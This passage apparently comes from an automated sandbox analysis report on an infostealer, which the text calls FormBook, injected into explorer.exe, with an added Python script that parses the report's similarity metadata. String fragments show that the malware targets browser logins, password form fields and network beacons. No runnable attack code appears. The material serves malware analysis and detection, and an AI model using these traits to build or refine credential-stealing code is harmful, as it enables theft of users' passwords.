                                                                                                              • Instruction ID: 2a7761294be53452ae7f6383ec0ff37bd5350cc5da45962b19f83b570e8047e4
                                                                                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                              • Instruction Fuzzy Hash: B7529C30218A098BCB29EF6CC8847E9B7E1FB54304F51562ED49BDB142EE30F54ACB91
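
The Similarity block above is the most informative one in this section: its API ID names the socket calls and its String ID carries the request constants the routine at deacf82 assembles. The following is an added example, not Joe Sandbox or FormBook code, that parses such a block and recovers what the two text IDs encode. It rests on two observations from this report that are treated as assumptions about the format: String ID is a "$"-separated, alphabetically sorted list of the function's string immediates, so a constant longer than one dword appears as scattered fragments ("Co", "nnec", "tion", ": cl", "ose"); and API ID is the sorted concatenation of the name words of the called APIs with a leading "Nt" dropped (NtProtectVirtualMemory gives "MemoryProtectVirtual", getaddrinfo+recv+setsockopt gives "getaddrinforecvsetsockopt"). The sample block and the candidate API list are copied from this page; how the numeric API String ID pair is derived is not shown on the page and is not reconstructed.

```python
"""Parse a Joe Sandbox per-function 'Similarity' block and recover the API
names and string fragments behind its API ID and String ID fields.

Added example; the field formats are assumptions inferred from this report.
"""
import re
from functools import lru_cache
from itertools import combinations

# Constructed input: the Similarity block of the function at 0DEACF82
# (explorer.exe, region 0DDB0000), copied from the report.
SAMPLE_BLOCK = """\
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 2a7761294be53452ae7f6383ec0ff37bd5350cc5da45962b19f83b570e8047e4
"""

# API names that appear in this report's execution graph.
KNOWN_APIS = ["getaddrinfo", "recv", "setsockopt", "socket", "connect", "send",
              "NtProtectVirtualMemory", "NtCreateFile", "CreateMutexExW",
              "CreateThread", "SleepEx", "ObtainUserAgentString"]

_FIELD = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID):\s?(.*)$")
_CAMEL = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")


def parse_block(text):
    """Return the block's fields; 'String ID' is split on '$' into fragments."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    raw = fields.get("String ID", "")
    fields["String ID"] = raw.split("$") if raw else []
    return fields


def api_id(api_names):
    """Build the 'API ID' for a set of called APIs (assumed format: strip a
    leading 'Nt', split names into words, sort the words, concatenate)."""
    words = []
    for name in api_names:
        base = name[2:] if name.startswith("Nt") else name
        words.extend(_CAMEL.findall(base))
    return "".join(sorted(words))


def resolve_api_id(target, candidates=KNOWN_APIS):
    """Find the smallest subset of candidates whose api_id equals target.
    Brute force is fine for the dozen names a report section lists."""
    for k in range(1, len(candidates) + 1):
        for subset in combinations(candidates, k):
            if api_id(subset) == target:
                return sorted(subset)
    return None


def tiles(phrase, fragments):
    """True if phrase can be written as a concatenation of the fragments,
    i.e. the scattered String ID pieces could come from that one constant."""
    frags = {f for f in fragments if f}

    @lru_cache(maxsize=None)
    def ok(i):
        if i == len(phrase):
            return True
        return any(phrase.startswith(f, i) and ok(i + len(f)) for f in frags)

    return ok(0)


def summarize(block_text=SAMPLE_BLOCK):
    """Resolve the APIs and check which request constants the fragments form."""
    b = parse_block(block_text)
    return {
        "apis": resolve_api_id(b["API ID"]),
        "fragments": b["String ID"],
        "connection_close": tiles("Connection: close", b["String ID"]),
        "form_params": tiles("dat=&un=&br=", b["String ID"]),
    }


if __name__ == "__main__":
    print(summarize())
```

On the sample block, `summarize()` resolves the API ID to getaddrinfo, recv and setsockopt and shows that the fragments tile into "Connection: close", "GET " and "dat=&un=&br=", which is what one would expect to see built in a routine that sits between a connect and a send.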

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              [Control-flow graph of deac232 to deac8cd (explorer.exe, region 0DDB0000), rendered as an image in the original report; basic-block and edge listing omitted. NtCreateFile is issued at deac410 and is followed by a call to deac172; the surrounding blocks call deac942 repeatedly and deade92 at deac657.]
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID: `
                                                                                                              • API String ID: 823142352-2679148245
                                                                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                              • Instruction ID: 95d7070af55706bd8270113daf1c95777b711a92a47f4af34a0521f686882214
                                                                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                              • Instruction Fuzzy Hash: 8D223B74A18A0A9FCB59DF2CC4946AAB7E1FB98305F50522EE45EEB250DF30E451CB81

Control-flow Graph
control_flow_graph 447 deade12-deade38 448 deade45-deade6e NtProtectVirtualMemory 447->448 449 deade40 call deac942 447->449 450 deade7d-deade8f 448->450 451 deade70-deade7c 448->451 449->448
APIs
• NtProtectVirtualMemory.NTDLL ref: 0DEADE67
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: a046e715693f89fb09aa5af3aa0ad9c55d9fa2fa5106b40d2cc62e0b9efc7144
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: 7D01B134628B884F8B88EF6CD48012AB7E4FBDD314F000B3EE99AC7254EB74D5414742

Control-flow Graph
control_flow_graph 452 deade0a-deade6e call deac942 NtProtectVirtualMemory 455 deade7d-deade8f 452->455 456 deade70-deade7c 452->456
APIs
• NtProtectVirtualMemory.NTDLL ref: 0DEADE67
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: 75012664ede0b56c85c9988c202593571020b229bcdfb44534c55e70c808bd19
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 1701A734628B884B8748EB2C94411A6B3E5FBCE314F000B3EE59AC3240DB25D5014782

APIs
• ObtainUserAgentString.URLMON ref: 0DEA79A0
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: f4313debbdef26f16a5806a5678ec72c83e3b28e17f17907895a88fa6fd64265
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 3931C031614A1D8FCB04EFACC8847EDBBE1FB58204F41122AE54EDB240DE749645C799

APIs
• ObtainUserAgentString.URLMON ref: 0DEA79A0
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: 0bef9686e9a3f3806680b4ebb8be67e13e7f96668ad57838a4c9dd45e508612e
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: F121C330614A5D8ECB05EFACC8847EDBBA1FF58204F41522AE55ADB240DF74D605C795

Control-flow Graph
control_flow_graph 232 dea3b66-dea3b68 233 dea3b6a-dea3b6b 232->233 234 dea3b93-dea3bb8 232->234 235 dea3bbe-dea3c22 call deaa612 call deac942 * 2 233->235 236 dea3b6d-dea3b71 233->236 237 dea3bbb-dea3bbc 234->237 246 dea3c28-dea3c2b 235->246 247 dea3cdc 235->247 236->237 238 dea3b73-dea3b92 236->238 237->235 238->234 246->247 248 dea3c31-dea3cb0 call deaeda4 call deae022 call deae3e2 call deae022 call deae3e2 246->248 249 dea3cde-dea3cf6 247->249 261 dea3cb5-dea3cca CreateMutexExW 248->261 262 dea3cce-dea3cd3 261->262 262->247 263 dea3cd5-dea3cda 262->263 263->249
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: 244a5c2d92032aa6ac305fff3beefbe0fb8d5fa18342d3d935e5328b6077522f
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: 72415A70A18A098FDB54EFA8C8947A977E0FF58300F01527AD94AEB255DE30E945CB85

Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: 052204ed6c298767027ae76c6a6c06fa3ea371a14b20001dc5fc494c2b0dadab
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: BD413C70A18A098FDB44EFA8C8947AD77E0FF68300F05517AD94EEB255DE30E945CB85

Control-flow Graph
control_flow_graph 293 dea972e-dea9768 294 dea976a-dea9782 call deac942 293->294 295 dea9788-dea97ab connect 293->295 294->295
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: face4e443573aace2cf836cf3a840c82af8ca9d9143aebc3b5cbd7ba29f3b6b8
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: A1015E34618B188FCB84EF1CE088B55B7E0FB58314F1545AEE90DCB226CA74D8818BC2

Control-flow Graph
control_flow_graph 298 dea9732-dea9768 299 dea976a-dea9782 call deac942 298->299 300 dea9788-dea97ab connect 298->300 299->300
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: 0b4cab5c13dd6235ba091ae77fd99dfb35a80d87f3f11a853cb2aa75f3a0f587
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: B1014F70618A1C8FCB84EF5CE488B55B7E0FB59314F1541AEE90DCB226CB74D9818BC2

Control-flow Graph
control_flow_graph 411 dea96b2-dea96e5 412 dea96e7-dea96ff call deac942 411->412 413 dea9705-dea972d send 411->413 412->413
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: aa99306383fcbefc47856587c64c67d1d51bb9414809679e10c17f1945bc6619
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: C7011270518A198FDB84EF1CD448B2577E0EB58314F1645AED85DCB266CA70D8818B81

Control-flow Graph
control_flow_graph 416 dea95b2-dea95ea 417 dea960a-dea962b socket 416->417 418 dea95ec-dea9604 call deac942 416->418 418->417
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: ba4bc6e71b995bd1ebd60e30eff04d9c8ea486f3a2f85f7eac219ff2692ebb58
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: D2014470618A1C8FCB84EF1CD048B54BBE0FB59314F1545ADD45EDB266C7B0D981CB86

Control-flow Graph
control_flow_graph 421 dea12dd-dea1320 call deac942 424 dea13fa-dea140e 421->424 425 dea1326 421->425 426 dea1328-dea1339 SleepEx 425->426 426->426 427 dea133b-dea1341 426->427 428 dea134b-dea1352 427->428 429 dea1343-dea1349 427->429 431 dea1370-dea1376 428->431 432 dea1354-dea135a 428->432 429->428 430 dea135c-dea136a call deabf12 429->430 430->431 434 dea1378-dea137e 431->434 435 dea13b7-dea13bd 431->435 432->430 432->431 434->435 439 dea1380-dea138a 434->439 436 dea13bf-dea13cf call dea1e72 435->436 437 dea13d4-dea13db 435->437 436->437 437->426 442 dea13e1-dea13f5 call dea10f2 437->442 439->435 440 dea138c-dea13b1 call dea2432 439->440 440->435 442->426
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: c6e254a1560d7ce8de14bfab6fd29d0cf8beffa87962cbbba5934cf790e3b23b
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: 46318B74608F4ADFDB65EF2D80882A5B3A0FB54304F46527ECA2DDA506CB70E058CF91

Control-flow Graph
control_flow_graph 457 dea1412-dea1446 call deac942 460 dea1448-dea1472 call deaec9e CreateThread 457->460 461 dea1473-dea147d 457->461
Memory Dump Source
• Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 61408f85bd35db22437c254377a34a4103330e42bb5a0b13b08ce1c32450c3f0
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: FBF0C234268B494FD788EB2CD44563AB3D0EBA8214F45063EA64DD7264DE29D5814716
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                              • API String ID: 0-393284711
                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                              • Instruction ID: 4bc3dba72ee6cf4c569179bb0f6d6ac67b622f658e9eb1cac71a2d645bbbb65b
                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                              • Instruction Fuzzy Hash: C6E15C70518B488FC765EF68D4947EBB7E0FB98301F504A2E959FC7291DF30A9418B89
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                              • API String ID: 0-2916316912
                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                              • Instruction ID: d8d7eebc5f92d7999a11bd476a21cffe36712ede311f2574da8406563e0862dc
                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                              • Instruction Fuzzy Hash: 5EB19E30518B488EDB54EF68D589AEEB7F1FF98300F50491ED49AC7251DF709909CB86
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                              • API String ID: 0-1539916866
                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                              • Instruction ID: 397f6f5da29e4c3e6a659c366a1e80b6430491a9d78025b2dabc2df8c567a800
                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                              • Instruction Fuzzy Hash: 4641B170A18B08CFDB14DF88A4896BE7BE2FB5C704F00025ED409D3285DBB59D458BD6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                              • API String ID: 0-355182820
                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                              • Instruction ID: 5f3c9d7daa0bf81bf153244d37f7e7bcfee7bcad3066f89450d261d2944ac0fd
                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                              • Instruction Fuzzy Hash: 67C15B70618B098FC758EF24D495ADAF3E1FB98304F404A2E949EC7250DF30E915CB8A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                              • API String ID: 0-97273177
                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                              • Instruction ID: e3896c25bddaa562c3a848d2d4dfdad36d029a57d485af8afe209783d77a283f
                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                              • Instruction Fuzzy Hash: AB51B33161C7488FD719DF18D4852ABB7E5FBC9700F501A2EE8DB87242DBB49906CB86
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                              • API String ID: 0-639201278
                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                              • Instruction ID: d69ea1b3e3fa0d29e5bec505af9a1f103a932a5686c083017b5874c882889bbf
                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                              • Instruction Fuzzy Hash: 8AC19070618A198FC758EF68E495AEAB3E1FB9C300F414769940AC7295DF30AE01CBC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                              • API String ID: 0-639201278
                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                              • Instruction ID: fd716134ab91db27c8b2d2bd8186ce3de267426ed018d703796525846cc0fa39
                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                              • Instruction Fuzzy Hash: 82C18070618A198FC758EF68E495AEAB3E1FB9C300F414769944AC7295DF30AE01CBD9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                              • API String ID: 0-2058692283
                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                              • Instruction ID: a100da03c9fa7d42d843a20ceb4377649e576dcfa312a056c99c47dc963780fb
                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                              • Instruction Fuzzy Hash: B7A1A2706187488FDB29EF68E5447EEB7E1FF88300F404A2DE48AD7291EF7499458789
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                              • API String ID: 0-2058692283
                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                              • Instruction ID: 34f9312aee0f12a09870417efce2e9d7d264f5a9da3a99abc65b91ee5b84b8d2
                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                              • Instruction Fuzzy Hash: B69191706187488FDB29EFA8E5447EEB7E1FF88300F40462DE44AD7291DF7499498789
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$e$n$v
                                                                                                              • API String ID: 0-1849617553
                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                              • Instruction ID: fdd150077dfbbc5208a2d65c574def2cd681c354ff4b38e6f789118ffa0e6234
                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                              • Instruction Fuzzy Hash: 1D718431618B488FDB58EF68D4847AAB7F1FF98305F00062ED45AC7261EB71ED458B85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                              • API String ID: 0-1970020201
                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                              • Instruction ID: 55367b44e487f1698b9db4687e173871b69323b7e56e67afcc06cac467494b2c
                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                              • Instruction Fuzzy Hash: BD515DB0918B4C8FDB55EFA4D044AEEB7F1FF58301F404A2EA59AE7254EF3095418B89
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                              • API String ID: 0-1610437797
                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                              • Instruction ID: 68fff690f8abf96016cc5dd7490a650854ce54441e7ae3606b085dcce8f1e4d7
                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                              • Instruction Fuzzy Hash: C9416F30218B488FCB65EF2498557EA73E4FF98301F454A2E995EC7240EF30D905CB86
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                              • API String ID: 0-327345718
